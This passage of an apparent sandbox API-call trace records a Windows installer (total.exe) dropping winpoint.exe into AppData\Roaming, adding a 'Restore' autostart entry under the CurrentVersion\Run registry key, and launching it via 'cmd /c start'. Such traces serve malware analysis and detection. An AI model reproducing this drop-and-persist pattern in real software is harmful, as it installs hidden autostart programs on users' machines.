hToken=0x0, dwFlags=0x0, pszPath=0x42e3a0 | out: pszPath="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming") returned 0x0 [0159.680] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\B.cab", iMaxLength=1024 | out: lpString1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\B.cab") returned="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\B.cab" [0159.680] SHGetFolderPathA (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x42e3a0 | out: pszPath="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming") returned 0x0 [0159.680] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe") returned="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe" [0159.680] SHGetFolderPathA (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x42e3a0 | out: pszPath="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming") returned 0x0 [0159.680] SHGetFolderPathA (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x42e3cf | out: pszPath="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming") returned 0x0 [0159.680] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\B.cab->C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\B.cab->C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe") returned="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\B.cab->C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe" [0159.701] MoveFileA (lpExistingFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\B.cab" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\roaming\\b.cab"), lpNewFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\roaming\\winpoint.exe")) returned 1 [0159.702] SHGetFolderPathA (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x42e3a0 | out: pszPath="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming") returned 0x0 [0159.702] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe") returned="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe" [0159.702] FindFirstFileA (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", lpFindFileData=0x42c0c0 | out: lpFindFileData=0x42c0c0) returned 0x2e7a78 [0159.702] FindClose (in: hFindFile=0x2e7a78 | out: hFindFile=0x2e7a78) returned 1 [0159.702] lstrcpynA (in: lpString1=0x40a418, lpString2="Restore", iMaxLength=1024 | out: lpString1="Restore") returned="Restore" [0159.702] lstrcpynA (in: lpString1=0x40a818, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Run", iMaxLength=1024 | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Run" [0159.702] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x18fbd0, lpdwDisposition=0x0 | out: phkResult=0x18fbd0*=0x19c, lpdwDisposition=0x0) returned 0x0 [0159.702] SHGetFolderPathA (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x42e3a0 | out: pszPath="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming") returned 0x0 [0159.703] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe") returned="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe" [0159.703] lstrlenA (lpString="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe") returned 52 [0159.703] RegSetValueExA (in: hKey=0x19c, lpValueName="Restore", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", cbData=0x35 | out: lpData="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe") returned 0x0 [0159.707] RegCloseKey (hKey=0x19c) returned 0x0 [0159.707] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0159.707] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0159.707] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0159.707] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0159.707] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0159.708] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll" [0159.708] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll" [0159.708] SHGetFolderPathA (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x42e3b1 | out: pszPath="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming") returned 0x0 [0159.708] lstrcpynA (in: lpString1=0x336564, lpString2="cmd /c start \"\" \"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\"", iMaxLength=1024 | out: lpString1="cmd /c start \"\" \"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\"") returned="cmd /c start \"\" \"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\"" [0159.708] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0159.708] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll" [0159.708] lstrcpynA (in: lpString1=0x40a418, lpString2="Exec", iMaxLength=1024 | out: lpString1="Exec") returned="Exec" [0159.708] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll") returned 0x0 [0159.710] LoadLibraryExA (lpLibFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll", hFile=0x0, dwFlags=0x8) returned 0x756f0000 [0159.711] GetProcAddress (hModule=0x756f0000, lpProcName="Exec") returned 0x756f1000 [0159.712] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0159.712] GetProcAddress (hModule=0x75c90000, lpProcName="IsWow64Process") returned 0x75ca195e [0159.712] GetCurrentProcess () returned 0xffffffff [0159.712] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18f964 | out: Wow64Process=0x18f964) returned 1 [0159.712] lstrcpyA (in: lpString1=0x3369a8, lpString2="cmd /c start \"\" \"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\"" | out: lpString1="cmd /c start \"\" \"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\"") returned="cmd /c start \"\" \"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\"" [0159.712] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x18fb44, dwRevision=0x1 | out: pSecurityDescriptor=0x18fb44) returned 1 [0159.712] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x18fb44, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x18fb44) returned 1 [0159.712] CreatePipe (in: hReadPipe=0x18fb98, hWritePipe=0x18fb8c, lpPipeAttributes=0x18fb68, nSize=0x0 | out: hReadPipe=0x18fb98*=0x19c, hWritePipe=0x18fb8c*=0x1a0) returned 1 [0159.712] CreatePipe (in: hReadPipe=0x18fb7c, hWritePipe=0x18fb90, lpPipeAttributes=0x18fb68, nSize=0x0 | out: hReadPipe=0x18fb7c*=0x194, hWritePipe=0x18fb90*=0x198) returned 1 [0159.713] GetStartupInfoA (in: lpStartupInfo=0x18fb00 | out: lpStartupInfo=0x18fb00*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0159.713] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="cmd /c start \"\" \"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x10, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18fb00*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x198, hStdOutput=0x1a0, hStdError=0x1a0), lpProcessInformation=0x18fb58 | out: lpCommandLine="cmd /c start \"\" \"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\"", lpProcessInformation=0x18fb58*(hProcess=0x1a4, hThread=0x1a8, dwProcessId=0x890, dwThreadId=0x894)) returned 1 [0159.737] GetTickCount () returned 0x3050e [0159.737] PeekNamedPipe (in: hNamedPipe=0x19c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0159.737] Sleep (dwMilliseconds=0x64) [0160.307] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x0) returned 0x102 [0160.307] GetExitCodeProcess (in: hProcess=0x1a4, lpExitCode=0x18fb84 | out: lpExitCode=0x18fb84*=0x103) returned 1 [0160.307] PeekNamedPipe (in: hNamedPipe=0x19c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0160.307] PeekNamedPipe (in: hNamedPipe=0x19c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0160.307] Sleep (dwMilliseconds=0x64) [0160.415] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x0) returned 0x102 [0160.415] GetExitCodeProcess (in: hProcess=0x1a4, lpExitCode=0x18fb84 | out: lpExitCode=0x18fb84*=0x103) returned 1 [0160.415] PeekNamedPipe (in: hNamedPipe=0x19c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0160.415] PeekNamedPipe (in: hNamedPipe=0x19c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0160.415] Sleep (dwMilliseconds=0x64) [0160.526] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x0) returned 0x0 [0160.526] GetExitCodeProcess (in: hProcess=0x1a4, lpExitCode=0x18fb84 | out: lpExitCode=0x18fb84*=0x0) returned 1 [0160.526] PeekNamedPipe (in: hNamedPipe=0x19c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0160.526] wsprintfA (in: param_1=0x18fa80, param_2="%d" | out: param_1="0") returned 1 [0160.526] lstrcpynA (in: lpString1=0x336564, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0160.526] CloseHandle (hObject=0x1a8) returned 1 [0160.526] CloseHandle (hObject=0x1a4) returned 1 [0160.526] CloseHandle (hObject=0x1a0) returned 1 [0160.526] CloseHandle (hObject=0x19c) returned 1 [0160.526] CloseHandle (hObject=0x198) returned 1 [0160.526] CloseHandle (hObject=0x194) returned 1 [0160.527] OleUninitialize () [0160.527] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0160.527] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0160.527] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned 46 [0160.527] lstrcpynA (in: lpString1=0x433400, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0160.527] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.527] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.527] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.527] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0160.527] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.528] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.528] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.528] lstrcpynA (in: lpString1=0x3369ac, lpString2="kernel32::GetShortPathName(t R3, t.R3,i 1024)", iMaxLength=1024 | out: lpString1="kernel32::GetShortPathName(t R3, t.R3,i 1024)") returned="kernel32::GetShortPathName(t R3, t.R3,i 1024)" [0160.528] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.528] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.528] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0160.528] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0160.528] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0160.529] lstrcpyA (in: lpString1=0x3401e0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0160.529] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0160.529] lstrcpyA (in: lpString1=0x33e508, lpString2="GetShortPathName" | out: lpString1="GetShortPathName") returned="GetShortPathName" [0160.529] lstrcpynA (in: lpString1=0x3401e0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0160.529] lstrcpynA (in: lpString1=0x340df8, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0160.529] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.529] lstrcpynA (in: lpString1=0x3409f0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.529] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.529] GetShortPathNameA (in: lpszLongPath="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", lpszShortPath=0x3409f0, cchBuffer=0x400 | out: lpszShortPath="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned 0x2e [0160.529] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0160.529] lstrcpynA (in: lpString1=0x341200, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0160.530] lstrcpyA (in: lpString1=0x433400, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0160.530] lstrcpynA (in: lpString1=0x341200, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0160.530] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.530] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.530] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.530] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0160.530] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.530] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.530] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.530] lstrcpynA (in: lpString1=0x3369ac, lpString2="kernel32::GetTempPathA(i 1024, t .R0) i .r2", iMaxLength=1024 | out: lpString1="kernel32::GetTempPathA(i 1024, t .R0) i .r2") returned="kernel32::GetTempPathA(i 1024, t .R0) i .r2" [0160.530] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.530] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.530] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0160.531] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0160.531] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0160.531] lstrcpyA (in: lpString1=0x340df8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0160.531] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0160.531] lstrcpyA (in: lpString1=0x33e508, lpString2="GetTempPathA" | out: lpString1="GetTempPathA") returned="GetTempPathA" [0160.531] lstrcpynA (in: lpString1=0x3409f0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.531] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.531] lstrcpynA (in: lpString1=0x3409f0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.531] GetTempPathA (in: nBufferLength=0x400, lpBuffer=0x340df8 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned 0x25 [0160.531] lstrcpynA (in: lpString1=0x3409f0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" [0160.531] lstrcpyA (in: lpString1=0x432800, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" [0160.531] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="1024") returned 4 [0160.532] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="37") returned 2 [0160.532] lstrcpyA (in: lpString1=0x430800, lpString2="37" | out: lpString1="37") returned="37" [0160.532] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.532] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.532] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.532] lstrcmpiA 